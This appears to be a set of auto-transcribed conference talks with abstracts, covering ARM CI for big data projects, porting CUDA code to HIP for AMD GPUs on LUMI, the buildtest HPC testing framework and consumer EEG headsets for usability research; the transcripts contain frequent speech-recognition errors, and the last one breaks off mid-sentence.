we look at the price, we can see that adding ARM to the cluster brings about 25% of the money saving and combining two angles. I think ARM data center looks attractive. I have to mention that these tests are done in the default configurations of the cluster and the job. It's for demonstration purpose. There are many parameters that can be tuned for both software and hardware to make the performance better. If you are interested, you can also test it out with the servers provided by the previous mentioned cloud providers. Besides big data, our team have also contributed to a lot of open source projects in different layer of the software stack, including operating systems, libraries, cloud computing, middle veers, databases, web and AI. Here is the link to our tech blog and Slack channel. We have summarized some of our works on the blog. Feel free to read and comment. Some of them are still in Chinese, but we are working on translating them. If you have any questions or problems on porting projects on ARM platform, or you are also interested in promoting ARM platform in the open source world, feel free to contact us in the discussion section of the blog or through the Slack channel. Thank you for your time.
|
Currently, there are more and more ARM based datacenter hardware options on the market, and their performance has been continuously improving. Thus more and more users and customers are starting to consider using these datacenter hardware options for their business. Big Data is one of the most important areas. On the contrary, the open source ecosystem for Big Data on ARM is not that perfect: most of the software in the Big Data ecosystem does not care too much about running on ARM in advance, or developers have not officially tested their codes on ARM, and there are a lot of unsolved problems. In order to make those software solutions able to run on ARM, one has to search and read tons of articles and to do a lot of patches and build a numbers of dependencies on their own. And once the upstream changes or upgrades, there might be new problems since it is not tested on ARM in upstream. All these challenges made users concerned to use ARM for their business. In order to change this situation and make the Big Data open source ecosystem more friendly to ARM platform and its users, our team started by proposing adding ARM CI to those open source projects. By doing this, the projects will be fully tested on ARM and also all future changes will as well be tested on ARM. In the process, we fixed a lot of problems directly in upstream, which benefits all users. And then, we started to perform performance comparison tests between ARM and x86, to give users an overview of the status. And there are also large numbers of TODO items, for the future. In this session, you can learn the current status of ARM CI for Big Data ecosystem projects like Hadoop, Spark, Hbase, Flink, Storm, Kudu, Impala etc. and our efforts on fixing ARM related problems. We will also introduce our future plans.
|
10.5446/53660 (DOI)
|
Hello, my name is George Marco Van Oles. I'm a linked HPC scientist at CSE and I'm here to present you about getting started with AMD GPUs. Outline, also the motivation, a few words about Lumi, ROKM, introduction and porting codes to HIP. Test marking, Fortran and HIP, some differences and tuning. So the disclaimer, AMD ecosystem is under heavy development, many things can change without notice any week or month. All the experiments took place on Nvidia V100 video, it's a Poofti glass review at CSE. Trying to use the latest versions for ROKM, maybe till the presentation there will be a newer version. And some results are really first, investigating the outcome, so there are some small challenges. Now about Lumi, the Queen of the North, a new RDSPC project, it's a collection of many countries that are part of this project. So how many partitions you can see here, the Lumi GPU partitions with AMD E6 GPUs. You can see the X86 partition, only with processor for applications that cannot really use GPUs. You can see data analytics, high speedy deconnet, various storage systems depending on the needs and classic parallel file system of 80 petabyte. And this will be installed this year in Finland, so that's why we get ready for this infrastructure. So about motivation and challenges, Lumi will have AMD GPUs, that's why we need to know how to program them and learn about the ecosystem. We plan to provide training to Lumi users, probably once coming end of February, investigating the future about possible problems, so we want to find issues that maybe the user will have and we don't have access to AMD GPUs, so that's an issue that we work basically on NVIDIA GPUs. So here it is in a small example of MI100 architecture and you can see it has 8 shader engines that is constituted by compute units. And each shader engine has 16 compute units, about 8 of them are disabled and each compute unit has 64 shader processing cores. So basically the GPU command processor breaks down kernels to blocks and disappears into compute units. One compute unit can execute many blocks, threads from one block use the same compute unit and a kernel can have more blocks than what the compute unit can fit. So 64 thirds constitute the wave front, this is the terminology on AMD while on Google web and it's constituted by 32 threads. And you can see here in the middle the SE, the synchronous compute engines, the HWS for hardware scheduler and the DMA for asynchronous data transfers between GPU and host or between GPUs and here the fabric to connect with the other GPUs or with the host and some memory controllers etc. So differences between HIP and CUDA, I mentioned already that the wave fronts are a size of 64 threads while working CUDA is 32. Some CUDA laboratory factions do not have AMD equivalents and the serve memory and reserve thread can differ between AMD and Nvidia hardware. And now about the ROKM is an open software platform for GPU accelerator computing by AMD and it has many layers and we start with the support GPUs and you can see a list of support GPUs, of course there will be more and some other removed when they become older. We have the device driver which is basically the ROKM GPU driver and supports some Linux distributions and the thang driver interface to have a user API for the driver. The system at the time, the TCS at the time, low level manipulation and how to handle all the below layers. The main framework from AMD is the HIP and the OpenCL and we talk about HIP in this presentation. Libraries, now libraries there's something easy, when a library is called ROK and something then it's about AMD hardware, when it's HIP and something then it can run both on AMD and Nvidia. That's really a nice feature and there's also HIP forth for discuss a bit and then machine learning stuff. Application framework, buy and torts, test of loan, cafe, etc. and development and management tools, ROK prof and ROK tracer for profiling and tracing, ROK SMI like the Nvidia SMI and some debugging agents, etc. And there are many more that are not present here. Now, ROK installation is constituted by many components. ROK M CMake to provide some CMake files, the thang interface that I mentioned about the API to the driver, the HCC runtime API and then for ROK M puts handles for the layers, ROK M LLVM and CLANG basically, but the compiler that is used behind many cases. ROK M Info to provide information about the hardware. ROK M Device Libs is a device site library for some languages. ROK M Compiler Support is about basically to analyze some objects and then write them open compute common language on time among the HIP. And also I have here in the repository instructions of how to install all of these NSCrypt automates and the procedure and also the repo that I'm using for this talk. And now introduction of HIP. HIP is a heterogeneous interface for stability. It's developed by AMD to program on AMD GPUs. It's a C++ runtime API and supports both AMD and Nvidia platforms. HIP is similar to CUDA and there is no performance overhidden on Nvidia GPUs or there is some minimal some cases. Many well-known numbers have been ported to HIP but of course there are plenty more. New projects or porting from CUDA could be developed directly to HIP because with HIP you can run AMD or Nvidia so this is some probability. And of here is the repository where to find the HIP. Now differences between CUDA and HIP API. You can see here the two columns and for example here we have CUDA.h and here we have this HIP API and all the CUDA cores CUDA Maloc etc are converted to HIP Maloc, HIP MCBI, HIP DevicycleNICE. So you can see a clear one-to-one mapping between the cores. Let's in kernel with CUDA HIP this is a bit different. So in CUDA we say kernel name, give a name, grid size, the number of blocks to launch, block size, the number of threads per block, search memory size, it's an additional search memory to allocate and the stream would seem to be used in the arguments. So here in the HIP you add this call HIP LUNSKERNGTL and then you take all of this and you put it inside. Can a name, grid size, do the same order. So as you can see it's really similar, it's a small difference. And the HIP API will have the device management, HIP, state device, gate device etc. This is useful for GPGVU. Memory management, HIP Maloc to allocate memory, memory, CBI, copy memory, copy, synchronous memory etc. Streams to create, to synchronize and stream free etc. And then create events, record events and other calls. And then you have the global device and the thread ID, block IDX and block DIM, work as a same as CUDA, you have the search memory, hundreds of math functions, covering a query CUDA math library, error handling, get last error, get error string to display the message. And here is a full API. So this is really a small part of the full API. Now, HIPify and HIPify2 is covered by the CUDA code. It's possible that not all the code is covered, the remaining is the implementation of the developer that's normal, but hopefully most of the code will be covered. HIPify.perl is a text-based search and replace and clever one. And HIPify.clang source-to-source translator that use clang compiler, so it does the compilation also. There's extensive reporting guide here from AMD and we'll continue with HIPify.perl. It can scan directories and covers CUDA codes with replacement of the CUDA to HIP like this, but it's more clever comments will not be does it, for example. So what I give you here as an example is if the file name is a source code and I give HIPify.perl and this argument, then the file name will be converted to file name with extension dot per HIP and this is the original file and the file name will be HIP. So the original code becomes file name dot per HIP and this is really nice because you keep the original code and the file name became HIP. Now, if you want to make a directory with full of files, you give us argument instead of the file, you give the directory, but you use the HIP converting place perl. So with this command, they will do the same job but for a directory. You convert all the files that are located inside the directory. Now here I do a list in this directory and I see these original files. So I did the HIP converting place in this directory and now the file you can see the dot C is a HIP and dot C per HIP is the original file. The dot H and dot H dot per HIP. If you want to change something to the original code, you change the dot per HIP files and then you execute again the command in the step two. Non-compilation took place, just conversion. Now the HIP file perl will then report for each file and it looks like this. I have minimized it. It says a totally converted 53 code calls to HIP and gives which category belongs to this calls. How many lines of code? I'll give you what calls you will see in the code now. So you can see HIP free, HIP blasted success and how many of them. Now here we see the output of the HIP file perl, the new code created in here. So the original code has a code of them in the code plus and the HIP file perl is clever enough for the sound that we need the blast. So it includes the HIP blast header here. And as you can see all the code calls now as HIP calls here and even before this is a bit older, they couldn't say now it's going to HIP blast destroy because this is how it works in the HIP blast library. So you can see that it's really state for comparison. So one of the things we'll compile the application with the HIP CSEAM, then you will get an error that HIP blast doesn't exist. That's normal because we have installed the HIP blast. So we still HIP blast and you can see on down in the repository how to install it and this version can continue and bypass this point. Just to mention here that when the HIP is on a video hardware, you should include the option minus XCU. So to still do HIP CSEAM, of course, every CSEAM that this file is basically handled like a CUDA and will have CUDA API calls. So this way to compile CPP files directly on a video hardware with HIP otherwise it can fail. So HIP CSEAM using NVCC on video GPUs and HCC for AMD GPUs. HIPify Clank is basically here you can build from source and create directly the outcome without seeing the HIPify file. Sometimes you need to include the manually headers of minus I and in this example, I take a.c file with one CUDA call and I added the argument myself printstats. You don't need to do that yourself. And you see the statistics of the code, how many lines of code change, the total lines of code, percentage, how many seconds took, etc. It's nice to see like that this information. Now with Bettsmac, the format application with OpenAPO flow, we found the Bettsmac from this HIP hub and the size is 2000 times 2000. All the CUDA calls were converted and it was linked with HIPLA among also OpenAPO flow. And here you can see the results of CUDA and HIP. Now you can see it's almost one Teraflop. You can see the CUDA is a bit higher than HIP and this value is of the total flops of all the application or the Bettsmac. While here it's only for the kernel. So you can see that the kernel, the HIP is a bit higher than CUDA. And this is a single precision. So the peak is 15 Teraflops and they achieve almost 12. And here you can see totally is around 2.23% overhead for HIP using NVidia GPUs. But this is really a great result. And here for the kernel is even fascinated. And this experiments happen 10 times, so to see that it always happen the same. And for the simulation, so basically I wanted to find another code that I have no idea and I found this and I use the old pairs and two keys. So 171 CUDA calls converted to HIP without issues around 1000 lines of code totally. I just showcase the HIP calls. I don't need to read them because you can see some of them are available. And there were more than 32,000 number of small particles with 2,000 time steps. And the CUDA execution code was 68.5 seconds and the HIP was 70.1 seconds and overhead 2.33% which is extremely low and good. And also I repeat experiments enough times. Now about photon, we have two scenarios. The first one is the photon plus CUDA in CC++ file and photon doesn't include any CUDA call in the photon files. And then in this case we can HIPify the CUDA with the tools automatic and combine and link with HIPCC and CCReleasing. The second scenario is CUDA font run and there is no HIP equivalent and HIP factions are called up from C using X and C and we'll see HIP for in the next slide. About HIP4, it's a photon interface library for GBKernel. You can find the repository down in the afterisk. And there's some effort how to port photon CUDA photon calls to photon HIP. The HIPify tool is not supported. So we'll do the kernels in a new C++ file and wrap the kernel in a C function and use photon 2003 C binding to call the function as we need more interest to be declared in the functions. And also from this side the Cethics could change the future so we'll see if there's a different direction. And of course you can use open APO flow to GPUs because port to HIP can take more effort so it depends on application, performance, achievement, etc. We have a photon CUDA example. SACHB single precision 8x plus Y. The original file was 29 lines of code and I wanted to port it manually to HIP 52 lines and with more than 20 new lines so it's a lot of work for such a small code. So someone can ask, should we try open APO flow before we try to HIP? This depends on your expertise and what performance you want to achieve as HIP theoretically has less layers. You need to just make a file to compile the multiple files. There's a make file from HIP folder that helps a lot. And the interesting part was that the HIP version is up to 30% faster compared to the CUDA photon which basically is NVCC vs. PGI compiler which is a bit interesting in strains. So there is a still checking the results and it's some interesting outcomes that when we use optimization flags the PGI is faster than the HIP version so there's something about all of this information about IOC banding etc. And example photon with HIP you can find it also here. So usually I don't like to have a code in my slides but here on the left I show you the original photon CUDA how it is and in the middle is the new photon 2003 with HIP where you can see in the box the interface built for the launch function and the options that they need to be passed because you have to use all those pointers to pass in the function. You see the code here, some HIP calls, HIP Maloc, HIPemory copy and we use the HIP check also provided by HIP4 to check about the difference if something failed or not from the calls. And on the right is a C++ file with HIP and extency and you can see here the launch in the box you can see that the launch routine that's declared the interface in the photon file. So the launch is called parameters, I declare here the grid and the block and I call the kernel with HIPLATS kernel GGL and I load the kernel and that's how it works until now of course with the HIP in photon. Now the MD OpenEP we have this is the LLVM OpenEP of float and gets improved by the time we have done really MD OpenEP trials. There are still performance issues that it's a bit lower performance than the HIP but MD improved it and we hope during the delivery it will be really great shape. And also you can find it in this link here on github. OpenEP or HIP some users would be questioning about the approach. OpenEP can provide a quick reporting but you need to be careful about data transfer and overhead you need to profile and with HIP maybe you have better performance as we avoid some layers but you need to program more. So it depends on you for complicated codes and programming languages as photon probably openEP provide a fast benefit but again it's some personal decisions and how much time you have to investigate the code. Porting codes to LUMI this is an internal diagram it's not official so it's just for discussion so have a diagram it says that here if the parallel code is without GPU or you can try some new libraries like Alpaca, SQL etc. If it's a post your programming language or if you're experienced you can go directly here and identify about HIP porting and go here and discuss about the C and the DDIFY profiling to find the kernels and ported to HIP or here in Fortran I profile the DDIFY kernels use HIP for if necessary prepare the kernels accordingly to the instruction for Fortran and port them to HIP. So if you're here and you're not really expert in going to HIP directly you can question and does it have openEP? If yes port to openEP or floating to GPUs and if the performance is good perfect and if the performance is no good then probably go directly here and check the openEP codes to tune them and different pragmas and data transfers and if still is not good then discuss about HIP as we discussed before. Now if the application has GPUs you can again go to rewrite in the new libraries which were not sure what is supported but hope they will be supported and if it's good then you have to choose if it's your Fortran and then HIP file kernels or use the Fortran approach and again the performance is good great if not fix a code if something was not converted in DDIFY use maybe some more security stuff and use of course the HIP libraries that are available if it's open to scene, open to scene will support it from a GNU then if the performance is good great otherwise think to port to open a P of floating with GPUs. So yes it's a bit complicated diagram but slowly you can catch up and choose your direction and maybe there are even more directions. Now profiling debugging, AMD will provide APIs for profiling debugging, Crayboard supports the profiling API through Craypad, some well-known tools are collaborating with AMD and preparing their tools for profiling and debugging. Some super environment variables such as AMD log level equal to 4 will provide some information. More information about the HIP memory copy error for example is like this where you take the error in a variable and you print it with a get error string and it scripts with a really human message what's up there about. Now tuning multiple wave fronts per computer unit is important to hide latency and extracts some throughput. Memory processing increases bandwidth as always and running loops allow compiler to preface data. Small kernel can cause latency overhead so adjust the workload accordingly and use of local memory. Data sharing LDS is a user managed class enables data sharing with threads that belong to the same third block. You can see me sharing the memory on the video and it's around the one-hundred-thousand faster copy to global memory. Procaming models we already described about the OpenCC will be available through GCC as MetaGraphics which now called Zimers EDA is developing the OpenCC creation. The focus for us Alpag and CCLUS should be available to be used on NUMI but they don't support all the programming languages so you need to be careful on this aspect. Depending on the code the port into HIP can be more straightforward to have applications that were ported and were running without problem. Of course there can be challenges depending on the code and what CPU functionalities are integrated into an application so this depends on what HIP supports but AMD is working on it. There are many approaches to port the code and you should select the one that you are more familiar and provides as possible as good performance. Of course it depends on the time that you have available. It will be required to tune the code for higher occupants of the GPU. This is classic approach. Always profiling I have to investigate data transfer issues not only and there will be some nice tools also on LUMI. And probably small products to try OpenIP with a flow to GPUs with necessarily with Fortran codes of course if there is OpenIP in the Fortran code but there is some extra effort to HIP Fortran codes. That's all for now. I would like to mention that the HIP 101 porting code occurs to HIP training organized by CSE. Registration deadline is 15 February and for now it's open to the LUMI consortium. Thank you and I'm up for any questions.
|
LUMI is a new upcoming EuroHPC pre-exascale supercomputer with peak performance a bit over 550 petaflop/s. Many countries of LUMI consortium will have access on this system among other users. It is known that this system will be based on the next generation of AMD GPUs and this is a new environment for all of us. In this talk we discuss the AMD ecosystem, ROCm, which is open source and available on github. We present with examples the procedure to convert CUDA codes to HIP, among also how to port Fortran codes with hipfort. We discuss the utilization of other HIP libraries and we demonstrate performance comparison between CUDA and HIP on NVIDIA GPUs. We explore the challenges that scientists will have to handle during their application porting and also we provide step by step guidance.
|
10.5446/53661 (DOI)
|
My name is Shazib Siddiqi. I work at Lawrence Berkeley National Lab. And today we'll be talking about build tests. It's an HP testing framework for facilities to run acceptance tests. Build test is an open source project. It can be found on GitHub. And on the right is the documentation. It's on buildtest.bddox.io. Build test is implemented in Python. It's a framework for the facilities to run acceptance tests for their system. Typically, this will be for the HPC staff to run acceptance tests on a frequent, like a maintenance outage or on a daily or weekly base where they would run tests to monitor different parts of the system. Typically, you will write these tests in YAML for using build tests, and these tests are validated through JSON schemas. Build tests will automatically create the tests and execute them on your system. Build test is not a replacement for tools like build tools like Make, CMake. And it's also not a software build framework responsible for installing software. While its goal is to test various components, including the software, that's not its primary role. In build tests, we will cover a few terminology. First, build spec is the YAML file that you will write tests. YAML is pretty easy to get started, and build tests will take that build spec and actually generate a shell script and run them. These build specs are validated through JSON schemas. We have global schema, which is a JSON schema that defines the top level structure of the build spec. And this global schema is actually validated for all build specs. We also have a sub schema that validates a test instance of the build spec. And this sub schema is lookup field through the type field. These sub schemas are also version schema. And every test is only validated with one sub schema. The build specs are executed using an executor, which is responsible for running the tests. These executors are defined in your configuration file. The executors can be typically a local executor or a batch executor. In version 08, in last year, we introduced JSON schemas. These JSON schemas were responsible for validating the build spec. This was a core change to the build test framework. This was primarily led by Vanessa. The concept was to change the validation process from our own implementation to using the JSON schema library. So we will write the JSON schema. We'll have regression tests against the schema with example valid and invalid tests for each schema. The JSON schemas were also published on GitHub pages. We had a workflow that automates the markdown, create markdown pages from schemas. On the right is an example of a compiler schema. It shows you all the properties available. And it's useful if you're going to write your build spec to reference this documentation. The schemas are also versioned. So it allows us for future development of the schema. And it will retain backwards compatibility. In build test, you will use the build test build command to build your test. You can specify a file using the dash B option, which will be relative or an absolute path. You can also specify directory which will find all build specs in a directory. You can also specify the directory and find the.yaml files. It will make sure that all the files are valid. If the file doesn't exist, then it will just exit. You can also append the dash B option. So you can have a file or directory and it will find all the tests. You can also build tests using tags. So imagine you have, you want to run all, like let's say benchmark tests. You can have a tags name corresponding to a string and build tests will find all the tests corresponding to the tag and build them. You can mix between the dash B and the dash tags option. You can also exclude files using the dash X. And this works on files and directories. And it can be appended multiple times. You can also build by executor. So imagine you want to run all tests that correspond to the executor. Oftentimes these executors are associated to a queue in your system, a batch queue system. In this example, we show a typical build. This is, we have a single build spec of a Python hello example. First, we will discover the test. Since this is a file, it will be only one test. You will get validated with the schema. In this example, it's using the script version 1.0 schema. Next, it will build the test. It will tell you that the name of the test is Python hello. It will generate a unique test ID and generate the shell script. The shell script is run using the executor. You will get this return code and a status message, typically a pass or fill to indicate if the test passes. And also build by tags. Tags is going to take a string value, arbitrary string. In this example, we're using a tag name called pass. You'll find that there's one build spec that corresponds to that. And it will run all the tests within that build spec. In this example, the build spec had four tests. And it will run. Now we'll cover the general pipeline. For every discovered build spec, build test typically goes through a five stage pipeline. And it will first parse the build spec with the JSON schema. This includes the global and the sub schema. Next, it will build the test, which includes generating a valid shell script. And then it will run the test from the YAML file. And that's the core part of build test, which actually auto generates the shell script. Next, it will run the test. It could be either an exit local or batch executor. This is defined by the executor property in the build spec. And depending on how it's run, we'll gather the results. If it's run locally, it's, it's, it's just means running the test and gathering the output and error file and return code. If it's through a queuing system, then we submit the job, pull for the job, get the results through the queue system. And finally, we update the report. And internally in build test that we can post, we can process the results. In this diagram, we, we cover the validation process of a build spec. As I mentioned, the build spec is validated with a global schema and a sub schema. And this diagram shows exactly how that's done. We have an input build spec. The test is called Hello World. It's a, it's a property within the build spec. The, the first part of the validation is the global schema validation. We use the version, the build specs and the maintainers field version and build specs are required fields. Maintainers and optional field. The version and the type field are a look of fields to find the sub schema. Since the sub schemas are a version one dot oh, we use a version and the type. And we find that it's a script version one dot oh schema that we need to use to validate the test. In this example. We show how this validation works. If the, if the build spec is not valid, it will be skipped. In this example, we show the build spec structure. So the version and the build spec are required fields version defines the schema version you want to use those spec is the declaration of one or more tests. The test in this example is system D default target, you can name it any, anything you want that name will show up in your test in, in the output, like of the build test build command. The executor is responsible for running the test. And this is important for how you want that test to be run. This local that bash is a running the test through the bash shell locally. The type is also required field. It tells you which schema to use. Just, you can specify description of the test. You can specify the tags you want, and that will use the build test build dash dash tags option if you want to build this test. And then the run section is actually going to specify the script. In this example is testing if the multi user target is the default target. Typically, a test with the return code zero is a pass. But sometimes you will want a different return code match. For instance, if you're going to try to run some kind of failed test, you may want to have to match a different return code and sort of zero. We have four tests in this example. The first test is an exit one fail. It will fail because exit one is a non zero. The second test is an exit one pass. We got an exit one. We're expecting an exit one. So this will pass. In the third test, we have an exit two. But we're expecting a one or three, we can have a list of different return codes to match. And this will fail because two is not in the list. In the last example, we got an exit 128 and we can match it with 128. So this one passes. We can customize shell using the shell property by default. The tests are run in bin bash, but you can use this. The system provided bin bash bin s h CSH, PCSH, CSH. We can also use Python and you can also add additional options to your liking. And this all affects the script schema when you're using the run, the when you're writing the tests. The Python shell support can be enabled using the shell property. And this will allow you to write Python code using the script schema. All you need to do is use the shell, specify the Python and change the executor to local Python. And then the run section is used to write Python code. This is a simple example of calculating the radius and the area of the circle. If you want to have some more complex Python scripts, you can, you know, bring your own Python code and invoke it using the bash or SHL. In built tests, we support Slurm, LSF, and Cobalt. We have schedule agnostic configuration using the batch property. In this example, we're going to submit a job with one node, one CPU, five minutes and five megabytes. The batch property for this one is going to use the Slurm parameters because this test will use the Slurm queue. And the batch property only implements a subset of the features that are shared between the schedulers. It's not, it's not, it's not intended to implement all the features because not all the features are applicable. For example, if you had a test that use the QoS field, this would be valid in Slurm, but if you were going to run the same test on LSF or Cobalt, you will not get this field. Therefore, built tests will just ignore that field during the test generation. We also support Cray burst buffer and data work on Cray systems. So you typically use the BV and DW directives. So in built tests, we have properties called BV and DW that map to these directives. In this example, we're creating a persistent burst buffer. It's called data buffer of size 10 gigabytes and striped access. This test is run on a K&L node. All we do is we go into the burst buffer and create a random five gigabyte file. And as you can see on the output on the top right, this random node TXT was created in the burst buffer. In order to switch to the burst buffer, we have to CD into the DW underscore persistent striped, and then the name of the buffer, and then create the file there. One thing to also mention is since this is a persistent burst buffer, this will be available when you do s control show first. Now we'll talk about the compiler schema. This is the other schema that we support for writing for running building single source compilation. This test will use the GCC 10 and nine compiler. Compilers are defined in your configuration file, you can actually retrieve them using built test config compilers. In this example, we have three compilers built in GCC and the two GCC compilers. This is a for the compiler schema you need to specify source file, which is a relative file to the build spec. Compilers is a start of compilers block, where you define how to search for compiler using the name property. And this property is a list of regular expressions to search for the compiler names. You define the default section, which is organized by compiler groups for compiler configuration. For instance, in this example, we have the GCC compiler block where we define the C flag and LD flags for compiling this code. We can also override compiler defaults in this example we have a Hello World and see we're going to search for the compiler with the regular expression built in GCC anything that starts with built in GCC and GCC. The default is going to be dash 01 for compiling all the GCC compilers, but in the conflict section, we can actually override the configuration, and this is organized by the name compilers. In this example, we will just, we will specify that GCC nine will use dash 02 and GCC 10 will use dash 03. If the test doesn't find the come doesn't pick up the compiler based on the regular expression, then it will ignore whatever is in the conflict section. For instance, if you specify GCC nine in your conflict, but it wasn't picked up. It will just simply be ignored and the test won't be created. We can also build a single test with multiple compilers. This is an example of an open MP reduction example using GCC Intel and cray compiler. So the regular expression, we have any compiler starts with GCC Intel or prog and cray because that's how the compilers were defined on Corey. So we're going to use a new field call all in the default section, which is configuration that's shared for all compiler groups, any property that you see in the all section is also available in each of the compiler groups. In this example, in these for declaring environment variables, the same properties available in each of the compiler groups, and it will be overridden. In this example, we're going to use for open mb threads and each of the compiler groups will compile this code with the open mp flag. As you can see in the test, all the this single reduction test was actually built for with all the GCC compilers program cray and the Intel compilers. So an MPI Laplacian code is built on it's run on a Canon node. We're using the Intel 19 compiler. We can also specify as patch options. This is available in the all section, which basically mapped to the as patch directives. And this property is also available in each of the compiler groups. And also, since this is an MPI code, we run this test through S run. This is the recommended way and slurm. That is probably that's specified in the run property. And this code is compiled with the MPI wrapper so we can use the CC property to specify what compiler to use. And Intel MPI we can use MPI ICC. We can also specify how to load and swap modules. So in order to use the Intel MPI week, we're going to load the MPI 2020 module. We also need to swap modules on Corey, the default module on on Corey at login is is is a different version of Intel so we can actually specify what how to swap modules. As you can see that the way the test is generated the modules are loaded first and then swapped. Now we'll talk about some other features in build tests, including the build spec cache. We can use the build test build spec fine to load and load all the build specs into the cache. And then you can then filter and format them using the dash dash filter and dash dash format. The filter option expects a key value pair, and you can specify multiple key value pairs separated by comma. On the top right is an example where we find all tests with the filter on the tag name. We're going to search by all the tags with a fail property and and and we find that there's two tasks. We can also change the way the format of the columns using the format option. In this example in the middle we're going to format by the name and the tags. And as you can see it changes the columns. And we can also have a multi key filter. So, in this example in the bottom right, we can actually filter all the tasks by the tags on the tutorial tags that equal tutorial. The test that use the executor local SH and that use the type script. We support multiple filter fields and format fields, you can find them using the dash dash help filter help format. Now whenever you run a test, it will be it it's stored in a JSON file for post processing. You can use a build test report command to actually display all the test results. And it can be queried using the filter and format options. It's very similar to the build spec feature that we discussed in the previous slide. The filter option is also a key value pair. You can also specify multiple filter arguments separated by comma and is treated as a logical and and the format also alters the column on the one on the bottom left. We're going to filter by the test name exit one pass name is a key that is a is a key of in the filter option that tells you how to filter by the test name. And these test names are specified in your build spec file. They built in this example on the bottom right, we can also filter by return code. So imagine you want to find all the tests that have a return code, let's say to it will find them for you. And we can also format by the columns in this example we format by name ID and return code. We can also filter by multiple states so multiple filter states. We have in this example we can filter by state, all tests of fail. And that run on the local SH executor. And this will filter using a logical and we'll talk about some of the tests that we have on Corey's test suite. You can find them in the link below. We try to test several components of the Corey system, including file system check we check basic system configuration, we check for network tests like, you know, pinging the login nodes data transfer nodes SSH connection, making sure the name servers are up. We use slurm so we make sure that basic slurm commands like you know as info s control, making sure the slurm controllers are available partitions are there. We also have two different slurm clusters so ESS slurm is another of our clusters we make sure that we can submit jobs to both clusters. We make sure that we can submit to all the cues. We can create a burst buffer, make sure that we can stage in stage out from the burst buffer. And we also have a list of failed jobs that test for different slurm configuration like time limit max nodes to the cues. In the application we have open ECC open MP MPI Mkl for a container we're using shifter so we make sure that shifter can pull images and run shifter through the job. And we also have E for us test suite which is the SPAC stack for testing. This is an example of SSI of testing the SSH paying in uptime of our like login nodes data transfer nodes. We have 12 Corey login nodes Corey zero one to 12 data transfer zero one to zero six we make sure that we can ping them and we can SSH to into them. And yeah just run remote commands against them. And we have some resources to get you started. If you just want to get started there are the schema docs, the installation guide. And yeah, it's, if you need help just please look at the slide chat join the slide channel and thank you.
|
Buildtest is an HPC testing framework to aid HPC facilities to perform acceptance testing for their system. HPC systems are growing in complexity, with a tightly coupled software and system stack that requires a degree of automation and continuous testing. In the past decade, two build frameworks (Spack, EasyBuild) have emerged and widely used in HPC community for automating build & installation process for scientific software. On the contrary, testing frameworks for HPC systems are limited to a few handful (ReFrame, Pavilion2, buildtest) that are in active development. In buildtest, users will write test recipes in YAML called buildspecs that buildtest process to generate a shell script. buildtest utilizes versioned-based JSON Schema for validating buildspecs and currently, we support two main schemas (compiler, script). The script schema and compiler schema are used for writing traditional shell-scripts (bash, sh, csh), python-scripts and single source compilation test. In this talk we will present an overview of buildtest and how one can write buildspecs. Furthermore, we will discuss Cori Testsuite in buildtest with several real examples on testing various components for Cori system at NERSC.
|
10.5446/53604 (DOI)
|
Okay, let's start. So the talk is community accessible. Electroencephalography monitoring of the user's mental state in the UX, UI or search. A few words about biometrics and usability. Well, it's no way typical approach to get information about the effectiveness of human computer interaction nowadays. But the share of instrumental biometric measurements in usability is constantly growing. One of the reasons for such growth is recent appearance of cheap user grade devices with biometric sensors. They are typically produced for entertainment and fitness goals, but are precise enough to provide useful information to assess usability metrics. In this talk, we'll cover a subset of these user grade devices, namely, electroencephalography headsets. Let's start from the user grade devices of EEG available on the market. I'd say that the most affordable of them is placed here on the lower bottom screen, lower bottom corner. It's a mind wave EEG headset produced by NeeraSky. Cost less than $200 has only one channel of measurements. That's why it's cheap. Then if you try to find something more complex, it will definitely be some device from a motif. The newest one I'd say is so-called a motif inside with only five channels or five sensors, which is still affordable about $300 or more comprehensive epoch. Now it's epoch plus with 14 channels, 14 sensors, obviously, and price about $800. So we have some possibility to increase the price even more if buying research license. We'll speak about it a little bit later. Of course, there is a nice open hardware solution available on the market. I'd say that it's the most expensive one if you do not build it yourself, but by already assembled device from OpenBCI. The number of channels varies from 4 to 16, and the cheapest we're in with four channels would cost you $600 and more expensive ones, well, and more comprehensive ones, can cost you even more, maybe more than $1,000. Little bit more about primary goal of these devices. On example of the cheapest NeeraSky Mind Wave one. This single sensor is really good in measuring mind concentration and mind relaxation, and that's why there are a lot of games and I'd say game-targeted devices based on these EEG headset. The most known are Puzzlebox orbit helicopter, which is more or less mind control. Well, you cannot say or just think fly to some specific direction, but at least you can make it fly up and lower while concentrating your thoughts and relaxing. And obviously the most spoken of them was Nikonimi ears, actually the artificial cat ears, which were standing still when you are thinking about something and relaxing when your mind is relaxed. Ears are not produced anymore, but you can still find them on eBay or any other second markets. A little bit more about channels and EEG waves. Traditionally, EEG signal, which is actually the electrical activity of neurons of human brain, are divided into several frequency ranges. Here you see five ranges, which are most informative. And you see here that all these ranges are visually distinguishable, one from another, I mean the shape of a signal. So that's a division for historical reasons. Four computers scientists were able to visually distinguish activity in specific EEG range. And still they have found that the noise which your brain produces in specific range reflects some specific activity. For example, better range reflects some mind concentration, mind focus, also some activity in terms of physical senses. Alpha wave actually means some relaxed mind, light meditation, or maybe some creativity related processes and so on. Frankly speaking, alpha and beta waves are most informative from the point of view of our topic. If you have a lot of sensors and not only one sensor like in the cheapest headset we were speaking about previously, then you should position these sensors on your head. And some specific places. For example, here you see proper placements for the epoch and epoch plus EEG headset, which are marked with color. All possible positions are well standardized and they have specific abbreviations like AF, F and so on. This allows us to get information from sensors in specific placements. How can we get data from the user grade EEG devices? Actually, there are two approaches. Some universal API. When the device is connected to Bluetooth or USB, we have some radio dongle or anything like this. You can use either SDK from the vendor of these devices. For example, all so-called community SDK from Emotive, which was properly teresftware, community was actually the name of this SDK, but not its nature. You could query a device locally. The other approach is using some API from the device vendor, which involves intermediate remote server of the vendor. In this case, the device sends data to the vendor server and some tool later downloads for you this data back. The new version of SDK from Emotive works exactly in this manner. A little bit more about exact headsets. NeuraskyMindWave, the simplest one. Here you see the open source tool, puzzle box synops, written in Python, by the way, which shows you exact intensity of electric noise in different ranges on the one, the only one on the single sensor of this headset. And also you see the quality of signal, which is measured based on the reference electrode. Emotive headsets, which have much more sensors, allow to measure much more than, well, obviously, than the previous one. If previous one could measure only two metrics, so-called essence attention, substantially based on the intensity of beta waves, obviously, and essence meditation, which is more alpha wave based, then Emotive headsets allow you to detect some more informative states of the user, like smiles, surprise, throne, blink, movements, which are detected just by accelerometers built inside of the headset. And if you have commercial license, targeted research activities, even more. And obviously, they allow to measure separate waves. I mean frequency range, of course. Little bit more about metrics. You see examples of measurements here, like alpha waves, low and high beta waves, just the upper part and the lower part 